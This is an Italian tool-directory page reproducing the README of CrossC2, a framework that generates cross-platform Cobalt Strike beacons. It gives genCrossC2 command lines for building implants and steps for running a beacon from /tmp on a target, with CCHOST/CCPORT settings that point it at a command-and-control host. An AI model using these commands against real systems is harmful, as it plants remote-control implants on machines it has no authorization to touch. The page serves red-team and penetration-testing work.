Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CrossC2 — Genera il payload cross-platform di CobaltStrike | Kitploit
Strumenti/GitHubGitHub/gloxec/crossc2
Frameworks per Penetration TestingFramework di ExploitGenerazione di PayloadPost-ExploitCommand and ControlRed TeamingSviluppo Payload
GitHubgloxec/crossc2

CrossC2

Genera il payload cross-platform di CobaltStrike

Vedi Repository
2.6k3743 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Framework CrossC2

Linux macOS GitHub issues-closed Release Downloads

CrossC2 Logo

README | 中文文档 | README_FULL | 中文完整文档

Supporto CobaltStrike

Supporto per la valutazione della sicurezza di CobaltStrike su altre piattaforme (Linux/MacOS/...), e include il supporto allo sviluppo del modulo post-penetrazione Unix

2023-07-31 16.56.51

Utilizzo

  1. Scarica

Scarica CrossC2.cna genCrossC2 CrossC2Kit, modifica la configurazione CrossC2.cna

  1. Crea listener e copia la chiave
  • Crea listener windows/beacon_https/reverse_https
  • Copia .cobaltstrike.beacon_keys nella directory del teamserver in locale
  1. Estensione delle funzioni
  • Aggiungi CrossC2Kit_Loader.cna, includendo il caricamento in memoria e altre funzioni
  • Nella versione cs4.x mancano la gestione dei file e la funzione di elenco dei processi, devi usare questo Loader per riavviare
  1. Genera beacon

Usa la funzione GUI fornita da cli o cna per generare beacon di default

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

ex:

root@kitploit:~
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. specify the BEACON of the custom protocol dynamic library
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. specify the C2Profile that needs to be automatically parsed
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

configurazioni più avanzate possono essere trovate nella documentazione: 📄Riferimento

  1. Esegui beacon
  • Esegui lo script online con un clic generato dal plugin CrossC2 sul target
  • Dopo aver caricato il beacon sulla macchina target per l'operazione abilitata
  • Imposta la directory di lavoro per beacon ed esegui: export CCPATH=/opt/ && /tmp/c2
  • Specifica temporaneamente la libreria di protocollo per beacon ed esegui: /tmp/c2 /tmp/c2-rebind.so
  • Imposta temporaneamente la configurazione C2 per beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Imposta DEBUG per visualizzare lo stato online di beacon: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit è un'espansione di infiltrazione per la piattaforma Unix derivata da CrossC2. Usa il motore Aggressor Script Open Source Script. Può essere utilizzato per creare automazione per simulare il processo operativo del Red Team ed espandere il client CobaltStrike.

CrossC2Kit eredita le funzionalità originali di CobaltStrike, quindi la grammatica di sviluppo e scrittura fa ancora riferimento alla documentazione ufficiale: https://trial.cobaltstrike.com/aggressor-script/index.html

Ma ha alcune estensioni API sopra CrossC2 per controllare il beacon della piattaforma Unix

API: 📄Riferimento

Demo: CrossC2_action2

Nota

Solo per uso interno da parte di imprese e organizzazioni, questo framework ha un certo grado di instabilità. Ai non professionisti non è consentito utilizzarlo. Nessuno deve usarlo per scopi illegali e per profitto. Inoltre, è vietato pubblicare versioni modificate senza autorizzazione, altrimenti si incorre in responsabilità legali.

Da fare

  1. Supporto per http-proxy (auth) e connessione inversa tramite proxy socks
  2. node beacon? (Tipo nodo singolo, può ospitare altri beacon senza dipendere dal teamserver)
  3. Supporto per reverse shell su Linux & MacOS tramite so/dylib e funzioni di injection di processo derivate

Ringraziamenti

Grazie a @Emma per il Logo disegnato per CrossC2, progettato nello stile delle serie Armitage e CobaltStrike

Scarica lo strumento
CS3.14 (correzioni di bug)CS4.0CS4.X (4.1~4.8)
Branch master✅
branch cs4.0✅
branch cs4.1✅
Pagina di rilascio <= v2.1✅
Pagina di rilascio >= v2.2✅